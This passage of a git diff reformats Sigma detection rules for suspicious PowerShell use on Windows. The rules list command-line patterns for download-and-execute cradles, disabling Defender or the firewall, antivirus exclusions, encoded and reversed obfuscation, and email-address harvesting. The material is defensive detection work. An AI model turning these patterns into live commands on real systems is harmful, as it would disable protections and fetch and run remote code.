condition: process_creation and (all of selection_*) falsepositives: - Legitimate use to pass password to different powershell commands diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml index 3f5cc38da..277637f7d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml @@ -1,8 +1,7 @@ title: Potential PowerShell Obfuscation Via Reversed Commands id: b6b49cd1-34d6-4ead-b1bf-176e9edba9a4 status: test -description: Detects the presence of reversed PowerShell commands in the CommandLine. - This is often used as a method of obfuscation by attackers +description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers references: - https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/ - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66 @@ -22,18 +21,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: - hctac - kaerb - dnammoc - - ekovn + - ekovn # Also covers 'ekovni' - eliFd - rahc - etirw @@ -56,7 +55,10 @@ detection: - hcaerof - retupmoc filter_main_encoded_keyword: - CommandLine|contains: + # We exclude usage of encoded commands as they might generate FPs as shown here: + # https://github.com/SigmaHQ/sigma/pull/2720 + # https://github.com/SigmaHQ/sigma/issues/4270 + CommandLine|contains: - ' -EncodedCommand ' - ' -enc ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml index 366346c44..fe062f91a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml @@ -4,8 +4,7 @@ status: test description: Detects the PowerShell command lines with special characters references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64 -author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton - (fp) +author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) date: 2020/10/15 modified: 2023/04/06 tags: @@ -21,24 +20,24 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_re: - - CommandLine|re: .*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.* - - CommandLine|re: .*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.* - - CommandLine|re: .*\^.*\^.*\^.*\^.*\^.* - - CommandLine|re: .*`.*`.*`.*`.*`.* + # TODO: Optimize for PySIGMA + - CommandLine|re: .*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.* + - CommandLine|re: .*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.* + - CommandLine|re: .*\^.*\^.*\^.*\^.*\^.* + - CommandLine|re: .*`.*`.*`.*`.*`.* filter_optional_amazonSSM: ParentProcessName: C:\Program Files\Amazon\SSM\ssm-document-worker.exe filter_optional_defender_atp: - CommandLine|contains: + CommandLine|contains: - new EventSource("Microsoft.Windows.Sense.Client.Management" - - public static extern bool InstallELAMCertificateInfo(SafeFileHandle - handle); + - public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle); condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Amazon SSM Document Worker diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml index a408e969c..952fe8e4f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml @@ -1,11 +1,10 @@ title: Computer Discovery And Export Via Get-ADComputer Cmdlet id: 435e10e4-992a-4281-96f3-38b11106adde related: - - id: db885529-903f-4c5d-9864-28fe199e6370 - type: similar + - id: db885529-903f-4c5d-9864-28fe199e6370 + type: similar status: test -description: Detects usage of the Get-ADComputer cmdlet to collect computer information - and output it to a file +description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -24,17 +23,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'Get-ADComputer ' - ' -Filter \*' - CommandLine|contains: + CommandLine|contains: - ' > ' - ' | Select ' - Out-File @@ -42,7 +41,6 @@ detection: - Add-Content condition: process_creation and (all of selection_*) falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_create_service.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_create_service.yml index 2fe2294c8..a4e0bdc9a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_create_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_create_service.yml @@ -1,8 +1,8 @@ title: New Service Creation Using PowerShell id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 related: - - id: 85ff530b-261d-48c6-a441-facaa2e81e48 - type: similar + - id: 85ff530b-261d-48c6-a441-facaa2e81e48 # Using Sc.EXE + type: similar status: test description: Detects the creation of a new service using powershell. references: @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml index 30594054d..95c7c6d8a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml @@ -17,13 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - GZipStream - ::Decompress condition: process_creation and selection falsepositives: - - Legitimate administrative scripts may use this functionality. Use "ParentImage" - in combination with the script names and allowed users and applications to - filter legitimate executions + - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml index 7530ca39c..f693b6da5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml @@ -1,8 +1,7 @@ title: PowerShell Execution With Potential Decryption Capabilities id: 434c08ba-8406-4d15-8b24-782cb071a691 status: experimental -description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the - next stage of the malware. +description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. references: - https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -21,33 +20,33 @@ detection: OriginalFileName: - PowerShell.EXE - pwsh.dll - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_cli_dir: - CommandLine|contains: + CommandLine|contains: - 'Get-ChildItem ' - 'dir ' - 'gci ' - 'ls ' selection_cli_gc: - CommandLine|contains: + CommandLine|contains: - 'Get-Content ' - 'gc ' - 'cat ' - 'type ' - ReadAllBytes selection_cli_specific: - - CommandLine|contains|all: - - ' ^| ' - - \*.lnk - - -Recurse - - '-Skip ' - - CommandLine|contains|all: - - ' -ExpandProperty ' - - \*.lnk - - WriteAllBytes - - ' .length ' + - CommandLine|contains|all: + - ' ^| ' + - \*.lnk + - -Recurse + - '-Skip ' + - CommandLine|contains|all: + - ' -ExpandProperty ' + - \*.lnk + - WriteAllBytes + - ' .length ' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml index 89ffcf893..4f2fd0bb9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml @@ -1,8 +1,7 @@ title: Powershell Defender Disable Scan Feature id: 1ec65a5f-9473-4f12-97da-622044d6df21 status: test -description: Detects requests to disable Microsoft Defender features using PowerShell - commands +description: Detects requests to disable Microsoft Defender features using PowerShell commands references: - https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps - https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_cli_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Add-MpPreference ' - 'Set-MpPreference ' selection_cli_option: - CommandLine|contains: + CommandLine|contains: - 'DisableArchiveScanning ' - 'DisableRealtimeMonitoring ' - 'DisableIOAVProtection ' @@ -34,11 +33,12 @@ detection: - 'DisableCatchupFullScan ' - 'DisableCatchupQuickScan ' selection_cli_value: - CommandLine|contains: + CommandLine|contains: - $true - ' 1 ' selection_encoded_modifier: - CommandLine|base64offset|contains: + CommandLine|base64offset|contains: + # Note: Since this is calculating offsets casing is important - 'disablearchivescanning ' - 'DisableArchiveScanning ' - 'disablebehaviormonitoring ' @@ -54,7 +54,7 @@ detection: - 'disablerealtimemonitoring ' - 'DisableRealtimeMonitoring ' selection_encoded_direct: - CommandLine|contains: + CommandLine|contains: - RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA - QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA - EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml index d04f54993..d34c40b1a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml @@ -1,11 +1,10 @@ title: Powershell Defender Exclusion id: 17769c90-230e-488b-a463-e05c08e9d48f related: - - id: c1344fa2-323b-4d2e-9176-84b4d4821c88 - type: similar + - id: c1344fa2-323b-4d2e-9176-84b4d4821c88 + type: similar status: test -description: Detects requests to exclude files, folders or processes from Antivirus - scanning using PowerShell cmdlets +description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets references: - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md @@ -24,11 +23,11 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - 'Add-MpPreference ' - 'Set-MpPreference ' selection2: - CommandLine|contains: + CommandLine|contains: - ' -ExclusionPath ' - ' -ExclusionExtension ' - ' -ExclusionProcess ' diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml index e2e91d8bf..abd572b97 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml @@ -20,37 +20,34 @@ detection: EventID: 4688 Channel: Security selection_pwsh_binary: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - -DisableBehaviorMonitoring $true - -DisableRuntimeMonitoring $true selection_sc_binary: - - NewProcessName|endswith: \sc.exe - - OriginalFileName: sc.exe + - NewProcessName|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sc_tamper_cmd_stop: - CommandLine|contains|all: + CommandLine|contains|all: - stop - WinDefend selection_sc_tamper_cmd_delete: - CommandLine|contains|all: + CommandLine|contains|all: - delete - WinDefend selection_sc_tamper_cmd_disabled: - CommandLine|contains|all: + CommandLine|contains|all: - config - WinDefend - start=disabled - condition: process_creation and (all of selection_pwsh_* or (selection_sc_binary - and 1 of selection_sc_tamper_*)) + condition: process_creation and (all of selection_pwsh_* or (selection_sc_binary and 1 of selection_sc_tamper_*)) falsepositives: - - Minimal, for some older versions of dev tools, such as pycharm, developers were - known to sometimes disable Windows Defender to improve performance, but this - generally is not considered a good security practice. + - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml index d8a15ef66..72c3b2f48 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml @@ -1,8 +1,8 @@ title: Windows Firewall Disabled via PowerShell id: 12f6b752-042d-483e-bf9c-915a6d06ad75 related: - - id: 488b44e7-3781-4a71-888d-c95abfacf44d - type: similar + - id: 488b44e7-3781-4a71-888d-c95abfacf44d + type: similar status: test description: Detects attempts to disable the Windows Firewall using PowerShell references: @@ -21,20 +21,20 @@ detection: EventID: 4688 Channel: Security selection_name: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \powershell_ise.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \powershell_ise.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-NetFirewallProfile ' - ' -Enabled ' - ' False' selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -All ' - Public - Domain diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml index 9d2b8d9df..904cd989f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml @@ -1,8 +1,7 @@ title: Disabled IE Security Features id: fb50eb7a-5ab1-43ae-bcc9-091818cb8424 status: test -description: Detects command lines that indicate unwanted modifications to registry - keys that disable important Internet Explorer security features +description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features references: - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ author: Florian Roth (Nextron Systems) @@ -19,15 +18,15 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -name IEHarden ' - ' -value 0 ' selection2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -name DEPOff ' - ' -value 1 ' selection3: - CommandLine|contains|all: + CommandLine|contains|all: - ' -name DisableFirstRunCustomize ' - ' -value 2 ' condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml index 310427b6f..5c7535848 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml @@ -1,8 +1,7 @@ title: Potential PowerShell Execution Via DLL id: 6812a10b-60ea-420c-832f-dfcc33b646ba status: test -description: Detects potential PowerShell execution from a DLL instead of the usual - PowerShell process as seen used in PowerShdll +description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll references: - https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md author: Markus Neis, Nasreddine Bencherchali @@ -19,18 +18,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \rundll32.exe - - \regsvcs.exe - - \InstallUtil.exe - - \regasm.exe - - OriginalFileName: - - RUNDLL32.EXE - - RegSvcs.exe - - InstallUtil.exe - - RegAsm.exe + - NewProcessName|endswith: + - \rundll32.exe + - \regsvcs.exe + - \InstallUtil.exe + - \regasm.exe + - OriginalFileName: + - RUNDLL32.EXE + - RegSvcs.exe + - InstallUtil.exe + - RegAsm.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - Default.GetString - FromBase64String - Invoke-Expression diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml index ff1d6854f..d977fe8a7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml @@ -1,11 +1,10 @@ title: Potential PowerShell Downgrade Attack id: b3512211-c67e-4707-bedc-66efc7848863 related: - - id: 6331d09b-4785-4c13-980f-f96661356249 - type: derived + - id: 6331d09b-4785-4c13-980f-f96661356249 + type: derived status: test -description: Detects PowerShell downgrade attack by comparing the host versions with - the actually used engine version 2.0 +description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 references: - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade- @@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -version 2 ' - ' -versio 2 ' - ' -versi 2 ' @@ -32,7 +31,7 @@ detection: - ' -ver 2 ' - ' -ve 2 ' - ' -v 2 ' - NewProcessName|endswith: \powershell.exe + NewProcessName|endswith: \powershell.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml index 681733778..eeff6bc3a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml @@ -1,11 +1,10 @@ title: Potential COM Objects Download Cradles Usage - Process Creation id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf related: - - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe - type: similar + - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe + type: similar status: test -description: Detects usage of COM objects that can be abused to download files in - PowerShell by CLSID +description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID references: - https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57 @@ -22,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: '[Type]::GetTypeFromCLSID(' + CommandLine|contains: '[Type]::GetTypeFromCLSID(' selection_2: - CommandLine|contains: + CommandLine|contains: - 0002DF01-0000-0000-C000-000000000046 - F6D90F16-9C73-11D3-B32E-00C04F990BB4 - F5078F35-C551-11D3-89B9-0000F81FE221 diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml index 71007a9f4..312ad2e0b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml @@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - .DownloadString( - .DownloadFile( - 'Invoke-WebRequest ' diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_dll.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_dll.yml index 1572532f0..76888dadc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_dll.yml @@ -1,8 +1,7 @@ title: Potential DLL File Download Via PowerShell Invoke-WebRequest id: 0f0450f3-8b47-441e-a31b-15a91dc243e2 status: experimental -description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest - cmdlet +description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Florian Roth (Nextron Systems), Hieu Tran @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - 'Invoke-WebRequest ' - 'IWR ' - CommandLine|contains|all: + CommandLine|contains|all: - http - OutFile - .dll diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_iex.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_iex.yml index c71c9bbd4..2ee12b843 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_iex.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_iex.yml @@ -19,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection_download: - CommandLine|contains: + CommandLine|contains: - .DownloadString( - .DownloadFile( - 'Invoke-WebRequest ' - 'iwr ' selection_iex: - CommandLine|contains: + CommandLine|contains: - ;iex $ - '| IEX' - '|IEX ' @@ -38,7 +38,6 @@ detection: - Invoke-Expression condition: process_creation and (all of selection_*) falsepositives: - - Some PowerShell installers were seen using similar combinations. Apply filters - accordingly + - Some PowerShell installers were seen using similar combinations. Apply filters accordingly level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml index 1e3064053..6ef96f9d5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml @@ -1,11 +1,10 @@ title: PowerShell Download Pattern id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 related: - - id: e6c54d94-498c-4562-a37c-b469d8e9a275 - type: derived + - id: e6c54d94-498c-4562-a37c-b469d8e9a275 + type: derived status: test -description: Detects a Powershell process that contains download commands in its command - line string +description: Detects a Powershell process that contains download commands in its command line string author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro date: 2019/01/16 modified: 2023/01/26 @@ -20,18 +19,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - new-object - net.webclient). - download - CommandLine|contains: + CommandLine|contains: - string( - file( condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml index 48b82e132..bee76d0c0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml @@ -17,14 +17,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - Add-PSSnapin - Get-Recipient - -ExpandProperty - EmailAddresses - SmtpAddress - -hidetableheaders - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml index 3686d91f5..2e3549926 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml @@ -1,16 +1,12 @@ title: Potential Suspicious Windows Feature Enabled - ProcCreation id: c740d4cf-a1e9-41de-bb16-8a46a4f57918 related: - - id: 55c925c1-7195-426b-a136-a9396800e29b - type: similar + - id: 55c925c1-7195-426b-a136-a9396800e29b + type: similar status: test -description: 'Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" - used as a Deployment Image Servicing and Management tool. - - Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, - and update features and packages in Windows images - - ' +description: | + Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images references: - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system @@ -27,12 +23,13 @@ detection: EventID: 4688 Channel: Security selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - Enable-WindowsOptionalFeature - -Online - -FeatureName selection_feature: - CommandLine|contains: + # Add any insecure/unusual windows features that you don't use in your environment + CommandLine|contains: - TelnetServer - Internet-Explorer-Optional-amd64 - TFTP diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_encode.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_encode.yml index 0e2fc9741..2393af046 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_encode.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_encode.yml @@ -20,17 +20,17 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' -en ' - ' -enc ' - ' -enco' - ' -ec ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe filter_encoding: - CommandLine|contains: ' -Encoding ' + CommandLine|contains: ' -Encoding ' filter_azure: ParentProcessName|contains: - C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\ diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml index 4785f2e4e..c3b7f8630 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml @@ -1,8 +1,7 @@ title: Suspicious PowerShell Encoded Command Patterns id: b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c status: test -description: Detects PowerShell command line patterns in combincation with encoded - commands that often appear in malware infection chains +description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ author: Florian Roth (Nextron Systems) @@ -19,20 +18,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.Exe - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.Exe + - pwsh.dll selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' -en ' - ' -enc ' - ' -enco' selection_encoded: - CommandLine|contains: + CommandLine|contains: - ' JAB' - ' SUVYI' - ' SQBFAFgA' @@ -46,7 +45,6 @@ detection: - \gc_worker.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Other tools that work with encoded scripts in the command line instead of script - files + - Other tools that work with encoded scripts in the command line instead of script files level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml index dbac48dbc..7b7924e2b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml @@ -1,8 +1,7 @@ title: Suspicious Obfuscated PowerShell Code id: 